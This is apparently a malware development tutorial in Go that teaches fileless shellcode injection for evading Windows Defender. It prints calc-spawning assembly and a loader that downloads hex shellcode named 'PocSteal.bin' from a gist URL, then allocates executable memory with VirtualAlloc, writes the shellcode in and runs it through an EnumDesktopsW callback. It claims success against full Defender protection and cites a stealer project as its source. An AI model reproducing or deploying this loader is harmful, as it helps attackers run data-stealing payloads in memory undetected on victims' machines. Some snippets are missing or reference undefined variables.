Maldev : [Evasion] Shellcode Injection and Fileless Execution
Malware Development using Golang — Shellcode injection
Fileless Malware
What is fileless malware? Fileless malware is malicious code that works directly within a computer’s memory instead of the hard drive. It uses legitimate, otherwise benevolent programs to compromise your computer instead of malicious files. It is “fileless” in that when your machine gets infected, no files are downloaded to your hard drive.
This makes fileless malware analysis somewhat more difficult than detecting and destroying viruses and other forms of malware protection that get installed directly on your hard drive. Because fileless malware attacks require no malicious files, traditional antivirus tools that perform hardware scans to locate threats may miss them altogether.
Fileless malware works by going straight into your computer’s memory. This means the malicious code never enters your hard drive. How it gets there is very similar to how other malicious code gets into your system.
Attackers use fileless malware to gain access to data they can either steal or use to sabotage the operations of an organization. Fileless malware hides by using applications administrators would usually trust, such as Windows script programs or PowerShell. Often, these are among the applications an organization whitelists. Fileless malware is not a rogue program sitting in a file all its own on your hard drive instead, it corrupts a trusted program, making it more difficult to detect.
Generates Position-Independent Code
Donut is an open-source project that generates position-independent shellcode from various file types, including .NET assemblies, PE files, and scripts. One of Donut’s main features is its ability to reflectively load and run assemblies or binaries directly from memory.
For this scenario the malware was generate using this library to make it can be directly can be executed in memory, after that this malware uploaded to cloud for next execution.
When Donut “generates position-independent” code, it ensures that all function calls, references, and data lookups are performed in a way that is independent of the code’s absolute location in memory. This allows the resulting shellcode to be placed (or “injected”) into various parts of a system’s memory
Shellcode Injection
Shellcode injection involves injecting this code into the memory of a running application and then forcing the application to execute it. Shellcode is a small sequence of carefully crafted machine code used as the payload in the exploitation of software vulnerabilities. The primary goal of shellcode is to open a shell or execute arbitrary commands on the target machine.
Sample shellcode to spawn calc.exe on windows :
section .text
global _start
_start:
; Set up the stack for the WinExec call
xor eax, eax ; Zero out eax
push eax ; Push null terminator
push 0x636c6163 ; Push "calc" in reverse order (little-endian)
mov ebx, esp ; Move the pointer to "calc\0" into ebx
; Call WinExec
mov eax, 0x7C801D7B ; Address of WinExec in kernel32.dll (you need to adjust this based on the specific system)
push eax ; Push the address of WinExec
ret ; Call WinExec
section .dataWindows API
The Windows API (Application Programming Interface) is a set of functions, protocols, and tools provided by Microsoft for interacting with the Windows operating system. It allows developers to create applications that can interact with system resources such as hardware, files, and other software.
Windows API in the context of malware development involves knowing how malicious software can exploit these APIs to perform harmful activities. Malware developers often use various Windows API functions to interact with the operating system at a low level, manipulate files, processes, networks, and more.
Sample WinAPI to call MessageBox :
Sample WinAPI to call OpenProcess:
Example: Shellcode Injection
Set the shellcode url : https://gist.githubusercontent.com/asgardian249/abe71b9bc6a76434c993e36bfc10c0e3/raw/d2ab8f5c0b759ef84f5a1b190aa471bd51c30f63/PocSteal.bin
Load the windows api dll.
func main(){
// Load DLLs
user32 := windows.NewLazyDLL("user32.dll")
kernel32 := windows.NewLazyDLL("kernel32.dll")
// Import calls
EnumDesktopsW := user32.NewProc("EnumDesktopsW")
GetProcessWindowStation := user32.NewProc("GetProcessWindowStation")
GetCurrentProcess := kernel32.NewProc("GetCurrentProcess")
VirtualAlloc := kernel32.NewProc("VirtualAlloc")
WriteProcessMemory := kernel32.NewProc("WriteProcessMemory")
// Get the shellcode from internet
// Allocate the memory and set memory protection
// Write the shellcode to specific memory
// Execute the shellcode
}Write function to download the shellcode from the cloud.
// Make the HTTP request
resp, err := http.Get(url)
if err != nil {
fmt.Printf("Error making HTTP request: %v\n", err)
return
}
defer resp.Body.Close()
// Check if the request was successful
if resp.StatusCode != http.StatusOK {
fmt.Printf("Received non-200 response code: %d\n", resp.StatusCode)
return
}
// Read the response body
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
fmt.Printf("Error reading response body: %v\n", err)
return
}
// Decode the hex string into bytes
shellcode, err := hex.DecodeString(string(body))
if err != nil {
fmt.Printf("Error decoding hex string: %v\n", err)
return
}Allocate the memory and specifies the memory protection.
address, _, _ := VirtualAlloc.Call(
0,
uintptr(len(shellcode)),
windows.MEM_COMMIT|windows.MEM_RESERVE,
windows.PAGE_EXECUTE_READWRITE,
)Write the shellcode to specific memory region that was allocate before.
WriteProcessMemory.Call(
pHandle,
address,
uintptr(unsafe.Pointer(&shellcode[0])),
uintptr(unsafe.Pointer(&size)),
)We use EnumDesktopsW to execute the shellcode.
winProc, _, _ := GetProcessWindowStation.Call()
fmt.Println("Calling EnumDesktopsW...")
_, _, err = EnumDesktopsW.Call(winProc, address, 0)
//fmt.Println(r1)
if err != nil {
log.Fatal(err)
}The malware is successfully executed on full protection of windows defender,
Conclusion
Fileless malware represents a sophisticated and stealthy threat in the cybersecurity landscape. Unlike traditional malware that relies on files written to disk, fileless malware operates by injecting malicious code directly into the memory of legitimate processes. This technique allows it to evade detection by many conventional security solutions, including Windows Defender, which typically scans for malicious files and known signatures.
Malware
[Source] https://github.com/hackirby/skuld
